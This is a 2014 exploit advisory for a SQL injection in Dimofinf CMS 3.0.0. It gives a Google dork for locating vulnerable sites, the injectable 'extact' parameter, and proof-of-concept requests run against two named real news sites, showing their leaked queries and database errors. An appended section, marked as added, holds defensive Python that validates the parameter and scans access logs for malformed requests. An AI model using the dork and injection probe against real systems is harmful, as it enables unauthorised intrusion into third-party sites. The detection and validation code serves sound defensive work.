
Dimofinf cms Version 3.0.0 SQL Injection

Author: 7r9 al7Dod, Published: 18-05-2014
# Exploit Title: Dimofinf cms Version 3.0.0 SQL Injection
# Google Dork: intext:"Powered by Dimofinf cms Version 3.0.0"
# Date: [2014/5/18]
# Exploit Author: 7r9 al7Dod
# Vendor Homepage: https://www.dimofinf.net/
# Tested on: win&linux
# Greetz : Allah , OUT-l4w , all sudanese hacker


[~] VULNERABILITY}~~

[~] www.site.com/blocks/extra/x-news-tmcomnt.php?extact=3|1|147733'

[~] POC}~~
[~] ==1==

[~] http://www.alrakoba.net/blocks/extra/x-news-tmcomnt.php?extact=3|1|147733'
Database error in Dimofinf v3.0.0 :
***********************************
Invalid SQL:
SELECT id,caption FROM newsm WHERE date <= '1400403558' AND comnum != 0 AND id != 147733' AND round((UNIX_TIMESTAMP()-newsm.date)/86400)<=30 ORDER BY comnum DESC LIMIT 3,1;
***********************************
MySQL Error :
===================================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND round((UNIX_TIMESTAMP()-newsm.date)/86400)<=30 ORDER BY comnum DESC LIMIT ' at line 1
===================================
Error Number : 1064
Date :Sunday, May 18th 2014 04:59:18 AM
Script : http://www.alrakoba.net/blocks/extra/x-news-tmcomnt.php?extact=3|1|147733'
Referrer : REFERRER
IP Address : xx.xx.xx.xx
[~] ==2==
[~] http://www.alnilin.com/blocks/extra/x-news-tmcomnt.php?extact=3|1|147733'
Database error in Dimofinf v3.0.0 :
***********************************
Invalid SQL:
SELECT id,caption FROM newsm WHERE date <= '1400403892' AND comnum != 0 AND id != 147733' AND round((UNIX_TIMESTAMP()-newsm.date)/86400)<=30 ORDER BY comnum DESC LIMIT 3,1;
***********************************
MySQL Error :
===================================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND round((UNIX_TIMESTAMP()-newsm.date)/86400)<=30 ORDER BY comnum DESC LIMIT ' at line 1
===================================
Error Number : 1064
Date :Sunday, May 18th 2014 11:04:53 AM
Script : http://www.alnilin.com/blocks/extra/x-news-tmcomnt.php?extact=3|1|147733'
Referrer : REFERRER
IP Address : xx.xx.xx.xx
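
Added example (not part of the original advisory and not Dimofinf code): a strict validator for the `extact` parameter plus a scan of web-server access logs for requests to the affected script whose `extact` value is not three pipe-separated integers, which is what lets the trailing quote reach the `id != ...` clause in the error output above. The function names, the combined log format and the sample log lines are assumptions made for this example; the `n|n|n` shape is inferred from the value `3|1|147733` shown in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/blocks/extra/x-news-tmcomnt.php"   # script path from the advisory
# Assumed shape of a legitimate value: three unsigned integers joined by '|'.
EXTACT_RE = re.compile(r"[0-9]{1,10}\|[0-9]{1,10}\|[0-9]{1,10}")
# Request target inside a combined-format access-log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def parse_extact(raw):
    """Return the three fields as ints, or None if raw is not strictly n|n|n."""
    if not EXTACT_RE.fullmatch(raw):
        return None
    return tuple(int(part) for part in raw.split("|"))


def suspicious_requests(log_lines):
    """Yield (line_no, decoded extact) for endpoint hits with a missing or malformed extact."""
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != ENDPOINT:
            continue
        # parse_qs percent-decodes, so %27 and %7C are checked as ' and |.
        values = parse_qs(url.query, keep_blank_values=True).get("extact", [""])
        for value in values:
            if parse_extact(value) is None:
                yield line_no, value


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/May/2014:04:59:01 +0000] "GET /blocks/extra/x-news-tmcomnt.php?extact=3|1|147733 HTTP/1.1" 200 512',
    '192.0.2.77 - - [18/May/2014:04:59:18 +0000] "GET /blocks/extra/x-news-tmcomnt.php?extact=3|1|147733\' HTTP/1.1" 200 901',
    '192.0.2.77 - - [18/May/2014:04:59:20 +0000] "GET /blocks/extra/x-news-tmcomnt.php?extact=3%7C1%7C147733%27 HTTP/1.1" 200 901',
    '192.0.2.10 - - [18/May/2014:05:00:02 +0000] "GET /index.php?extact=x HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line_no, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: rejected extact={value!r}")
```

A server-side fix applies the same check before the query is built: reject anything `parse_extact` refuses and pass only the resulting integers to a parameterised statement.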



/-----------------www.sudaht.com--------------------\
|+------------------------------------------------+ |
|| 7r9 al7Dod & OUT-l4w | |
|| info@sudaht.com | |
|+------------------------------------------------+ |
\---------------------------------------------------/

Proud To be a Muslim
